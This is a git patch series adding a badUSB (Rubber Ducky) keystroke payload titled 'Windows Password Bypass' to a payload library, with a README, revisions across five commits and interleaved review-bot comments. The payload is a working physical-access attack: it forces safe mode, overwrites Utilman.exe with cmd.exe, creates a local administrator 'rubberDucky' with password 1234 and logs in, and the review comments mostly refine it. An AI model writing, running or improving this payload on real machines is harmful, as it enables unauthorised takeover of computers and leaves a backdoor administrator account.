From d23274874d772e906cab3146f31460e64c5923ae Mon Sep 17 00:00:00 2001
From: Tzur Soffer
Date: Fri, 27 Dec 2024 18:18:11 -0800
Subject: [PATCH 1/5] added WindowsPasswordBypass
---
 .../general/Break-Into-Windows/README.md | 20 +++
 .../general/Break-Into-Windows/payload.txt | 115 ++++++++++++++++++
 2 files changed, 135 insertions(+)
 create mode 100644 payloads/library/general/Break-Into-Windows/README.md
 create mode 100644 payloads/library/general/Break-Into-Windows/payload.txt
diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md
new file mode 100644
index 000000000..113adb75e
--- /dev/null
+++ b/payloads/library/general/Break-Into-Windows/README.md
@@ -0,0 +1,20 @@
+
+## Disclaimer
+
+This script is provided "as is" without any warranty of any kind, either express or implied. The use of this script is at your own risk. The author is not responsible for any damage or loss of data that may occur as a result of using this script. By using this script, you agree to these terms.
+
+## About:
+A badUSB script that gains full admin access to a windows machine from the login screen.
+
+## Important Note:
+This script currently only works on computer with one account.
+
+### How it works:
+1. It boots into safe mode
+2. It opens a cmd from safe mode
+3. It changes the Utilman.exe to be a cmd.exe
+4. It boots back into windows
+5. It opens the help menu which has been replaced with a cmd instance
+6. It creates a new admin account named ```rubberDucky``` with the password ```1234```
+7. it Reboots again, to register the new account
+8. It logs into the new account
\ No newline at end of file
diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt
new file mode 100644
index 000000000..93c3aa57f
--- /dev/null
+++ b/payloads/library/general/Break-Into-Windows/payload.txt
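Review bot: The "How it works" list in the new README describes the steps but not what the payload leaves on the host afterwards: Utilman.exe is overwritten with cmd.exe (the original kept beside it as Utilman2.exe) and a local administrator account rubberDucky with password 1234 is created, and no step restores either. A short "What it changes on the machine" section naming those artifacts would let a reader put a test machine back and gives a defender the host-side indicators to look for (a Utilman.exe that is a copy of cmd.exe, an unexpected Utilman2.exe, an unexpected local administrator). Under "Important Note", `This script currently only works on computer with one account.` should read `This script currently only works on computers with one account.`.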
@@ -0,0 +1,115 @@
+REM Title: Example Payload
+REM Author: Tzur Soffer
+REM Description: Break into Windows 10 + 11
+REM Target: Windows 10, Windows 10
+REM Props: Hak5, Darren Kitchen, Korben
+REM Version: 1.1
+REM Category: General
+
+REM get into safe mode
+STRING QQQQQQQQQ
+DELAY 3000
+TAB
+DELAY 50
+TAB
+DELAY 50
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 100
+UP
+DELAY 200
+
+HOLD SHIFT
+DELAY 200
+HOLD SPACE
+DELAY 100
+RELEASE SPACE
+DELAY 100
+ENTER
+RELEASE SHIFT
+
+DELAY 60000
+REM ADD CMD to login page
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+REM replace utilman.exe with cmd.exe
+
+REM Check each drive from C: to G: for Utilman.exe
+STRING @echo off
+ENTER
+STRING setlocal enabledelayedexpansion
+ENTER
+STRING for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
+ENTER
+STRING if exist %d:\Windows\System32\Utilman.exe (
+ENTER
+STRING echo Utilman.exe found in drive %d:
+ENTER
+STRING cd /d %d:\Windows\System32\
+ENTER
+STRING )
+ENTER
+STRING )
+ENTER
+STRING copy Utilman.exe Utilman2.exe
+ENTER
+STRING copy cmd.exe Utilman.exe /y
+ENTER
+
+STRING exit
+ENTER
+DELAY 1000
+ENTER
+DELAY 60000
+
+REM go into shell from login page
+STRING QQQQQQQQQ
+DELAY 3000
+TAB
+DELAY 50
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+
+REM create new admin acount
+STRING net user rubberDucky 1234 /add
+ENTER
+STRING net localgroup administrators rubberDucky /add
+ENTER
+STRING shutdown /r /t 0
+ENTER
+DELAY 45000
+
+REM login to new user
+STRING QQQQQQQQQ
+DELAY 3000
+TAB
+DELAY 50
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 500
+STRING 1234
+ENTER
\ No newline at end of file
From 21a93fcdb980625361ec3afc703c4fb05ed73ed4 Mon Sep 17 00:00:00 2001
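Review bot: The header line `REM Target: Windows 10, Windows 10` repeats Windows 10 while the Description line above it says Windows 10 + 11, so it should read `REM Target: Windows 10, Windows 11`. The comment `REM Check each drive from C: to G: for Utilman.exe` does not describe the loop under it, which iterates every letter A through Z; it should say `REM Check each drive letter A: to Z: for Utilman.exe`. `REM create new admin acount` is missing a letter (`account`), and `REM Title: Example Payload` is still the template placeholder rather than this payload's name.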
From: Tzur Soffer Date: Fri, 27 Dec 2024 19:08:42 -0800 Subject: [PATCH 2/5] Windows Password Bypass: Massive improvements to speed and reliability --- .../general/Break-Into-Windows/README.md | 3 --- .../general/Break-Into-Windows/payload.txt | 26 +++++++++---------- 2 files changed, 12 insertions(+), 17 deletions(-) diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md index 113adb75e..7c709b728 100644 --- a/payloads/library/general/Break-Into-Windows/README.md +++ b/payloads/library/general/Break-Into-Windows/README.md @@ -6,9 +6,6 @@ This script is provided "as is" without any warranty of any kind, either express ## About: A badUSB script that gains full admin access to a windows machine from the login screen. -## Important Note: -This script currently only works on computer with one account. - ### How it works: 1. It boots into safe mode 2. It opens a cmd from safe mode diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index 93c3aa57f..948def4a6 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -1,22 +1,17 @@ -REM Title: Example Payload +REM Title: Windows Password Bypass REM Author: Tzur Soffer REM Description: Break into Windows 10 + 11 REM Target: Windows 10, Windows 10 REM Props: Hak5, Darren Kitchen, Korben -REM Version: 1.1 +REM Version: 2.0 REM Category: General REM get into safe mode STRING QQQQQQQQQ DELAY 3000 +HOLD SHIFT TAB -DELAY 50 -TAB -DELAY 50 -TAB -DELAY 50 -TAB -DELAY 50 +RELEASE SHIFT ENTER DELAY 100 UP @@ -82,12 +77,11 @@ DELAY 60000 REM go into shell from login page STRING QQQQQQQQQ DELAY 3000 +HOLD SHIFT TAB DELAY 50 TAB -DELAY 50 -TAB -DELAY 50 +RELEASE SHIFT ENTER DELAY 1000 
@@ -96,19 +90,23 @@ STRING net user rubberDucky 1234 /add ENTER STRING net localgroup administrators rubberDucky /add ENTER -STRING shutdown /r /t 0 +STRING shutdown /l ENTER -DELAY 45000 +DELAY 10000 REM login to new user STRING QQQQQQQQQ DELAY 3000 +HOLD SHIFT +TAB +DELAY 50 TAB DELAY 50 TAB DELAY 50 TAB DELAY 50 +RELEASE SHIFT ENTER DELAY 500 STRING 1234 From 0f80f9524fa62c92717d0043ca551bc6064ca9e6 Mon Sep 17 00:00:00 2001 From: Tzur Soffer <103438808+TzurSoffer@users.noreply.github.com> Date: Wed, 1 Jan 2025 19:26:36 -0800 Subject: [PATCH 3/5] Works on logged in and logged out machines --- payloads/library/general/Break-Into-Windows/payload.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index 948def4a6..a8a6bb934 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -8,6 +8,7 @@ REM Category: General REM get into safe mode STRING QQQQQQQQQ +CTRL ALT DELETE DELAY 3000 HOLD SHIFT TAB @@ -110,4 +111,4 @@ RELEASE SHIFT ENTER DELAY 500 STRING 1234 -ENTER \ No newline at end of file +ENTER From 0ff0b0087931409b0878435c960c8f53a4a36de9 Mon Sep 17 00:00:00 2001 From: Tzur Soffer Date: Tue, 7 Jan 2025 14:46:34 -0800 Subject: [PATCH 4/5] Update coding style + README.md --- .../general/Break-Into-Windows/README.md | 16 ++++-- .../general/Break-Into-Windows/payload.txt | 53 ++++++++----------- 2 files changed, 35 insertions(+), 34 deletions(-) diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md index 7c709b728..baede3cd4 100644 --- a/payloads/library/general/Break-Into-Windows/README.md +++ b/payloads/library/general/Break-Into-Windows/README.md 
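Review bot: Replacing `STRING shutdown /r /t 0` with `STRING shutdown /l` turns the final step into a log-off, but this commit's README hunk only drops the Important Note and leaves "How it works" step 7 ("it Reboots again, to register the new account") unchanged, so the README and the payload now disagree. Step 7 should be updated in the same commit to say that the payload logs off and then signs in to the new account; the shorter `DELAY 10000` is consistent with that change.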
@@ -3,15 +3,25 @@ This script is provided "as is" without any warranty of any kind, either express or implied. The use of this script is at your own risk. The author is not responsible for any damage or loss of data that may occur as a result of using this script. By using this script, you agree to these terms. +### If you found [this repository](https://github.com/TzurSoffer/WindowsPasswordBypasser) useful, please give it a ⭐!. + +## Showcase + +[Watch showcase video on youtube](https://www.youtube.com/shorts/1XvC-QQdRzU) + ## About: A badUSB script that gains full admin access to a windows machine from the login screen. +**IMPORTANT NOTE**: This only works on machines with a local account; if you use an account connected to Microsoft, this will not work! + +## Note for pico-ducky +You might have to remove the following line as its not supported by the pico-ducky, but worry, the code should work just fine without it. ```EXTENSION PASSIVE_WINDOWS_DETECT``` + ### How it works: -1. It boots into safe mode +1. It reboots into safe mode 2. It opens a cmd from safe mode 3. It changes the Utilman.exe to be a cmd.exe 4. It boots back into windows 5. It opens the help menu which has been replaced with a cmd instance 6. It creates a new admin account named ```rubberDucky``` with the password ```1234``` -7. it Reboots again, to register the new account -8. It logs into the new account \ No newline at end of file +7. It logs into the new account diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index a8a6bb934..90021c2f5 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt 
@@ -3,9 +3,15 @@ REM Author: Tzur Soffer REM Description: Break into Windows 10 + 11 REM Target: Windows 10, Windows 10 REM Props: Hak5, Darren Kitchen, Korben -REM Version: 2.0 +REM Version: 2.1 REM Category: General +DEFINE #ACCOUNT_PASSWORD 1234 +DEFINE #ACCOUNT_NAME rubberDucky + +REM wait for Windows to accept keystrokes +EXTENSION PASSIVE_WINDOWS_DETECT + REM get into safe mode STRING QQQQQQQQQ CTRL ALT DELETE @@ -48,29 +54,18 @@ DELAY 1000 REM replace utilman.exe with cmd.exe REM Check each drive from C: to G: for Utilman.exe -STRING @echo off -ENTER -STRING setlocal enabledelayedexpansion -ENTER -STRING for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( -ENTER -STRING if exist %d:\Windows\System32\Utilman.exe ( -ENTER -STRING echo Utilman.exe found in drive %d: -ENTER -STRING cd /d %d:\Windows\System32\ -ENTER -STRING ) -ENTER -STRING ) -ENTER -STRING copy Utilman.exe Utilman2.exe -ENTER -STRING copy cmd.exe Utilman.exe /y -ENTER +STRINGLN @echo off +STRINGLN setlocal enabledelayedexpansion +STRINGLN for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( +STRINGLN if exist %d:\Windows\System32\Utilman.exe ( +STRINGLN echo Utilman.exe found in drive %d: +STRINGLN cd /d %d:\Windows\System32\ +STRINGLN ) +STRINGLN ) +STRINGLN copy Utilman.exe Utilman2.exe +STRINGLN copy cmd.exe Utilman.exe /y -STRING exit -ENTER +STRINGLN exit DELAY 1000 ENTER DELAY 60000 @@ -87,12 +82,9 @@ ENTER DELAY 1000 REM create new admin acount -STRING net user rubberDucky 1234 /add -ENTER -STRING net localgroup administrators rubberDucky /add -ENTER -STRING shutdown /l -ENTER +STRINGLN net user #ACCOUNT_NAME #ACCOUNT_PASSWORD /add +STRINGLN net localgroup administrators #ACCOUNT_NAME /add +STRINGLN shutdown /l DELAY 10000 REM login to new user @@ -110,5 +102,4 @@ DELAY 50 RELEASE SHIFT ENTER DELAY 500 -STRING 1234 -ENTER +STRINGLN #ACCOUNT_PASSWORD From ab865a1039a72c785f938b7879c211edd3b4ed39 Mon Sep 17 00:00:00 2001 
From: Tzur Soffer <103438808+TzurSoffer@users.noreply.github.com> Date: Tue, 7 Jan 2025 18:47:33 -0800 Subject: [PATCH 5/5] Fixed PASSIVE_WINDOWS_DETECT --- .../general/Break-Into-Windows/payload.txt | 25 ++++++++++++++++--- 1 file changed, 21 insertions(+), 4 deletions(-) diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt index 90021c2f5..18c78cfa9 100644 --- a/payloads/library/general/Break-Into-Windows/payload.txt +++ b/payloads/library/general/Break-Into-Windows/payload.txt @@ -3,14 +3,31 @@ REM Author: Tzur Soffer REM Description: Break into Windows 10 + 11 REM Target: Windows 10, Windows 10 REM Props: Hak5, Darren Kitchen, Korben -REM Version: 2.1 +REM Version: 2.2 REM Category: General -DEFINE #ACCOUNT_PASSWORD 1234 -DEFINE #ACCOUNT_NAME rubberDucky - REM wait for Windows to accept keystrokes EXTENSION PASSIVE_WINDOWS_DETECT + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF +END_EXTENSION + +DEFINE #ACCOUNT_PASSWORD 1234 +DEFINE #ACCOUNT_NAME rubberDucky REM get into safe mode STRING QQQQQQQQQ
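Review bot: The README's pico-ducky note still tells the reader to remove "the following line", `EXTENSION PASSIVE_WINDOWS_DETECT`, but after this hunk the extension is a block running from `EXTENSION PASSIVE_WINDOWS_DETECT` to `END_EXTENSION`, so deleting that one line would leave the block body behind; this commit does not touch the README, which should now say to remove the whole block. The comment `REM wait for Windows to accept keystrokes` now sits above a twenty-line block and would read better as a one-line summary grounded in what the block does, e.g. `REM poll for the host's lock-LED reply for up to #MAX_WAIT x #CHECK_INTERVAL ms, then mark $_OS as WINDOWS if the host sent more than #WINDOWS_HOST_REQUEST_COUNT configuration requests`. The lines that consume `$_OS` are outside this hunk, so whether the detection result is read later cannot be judged from here.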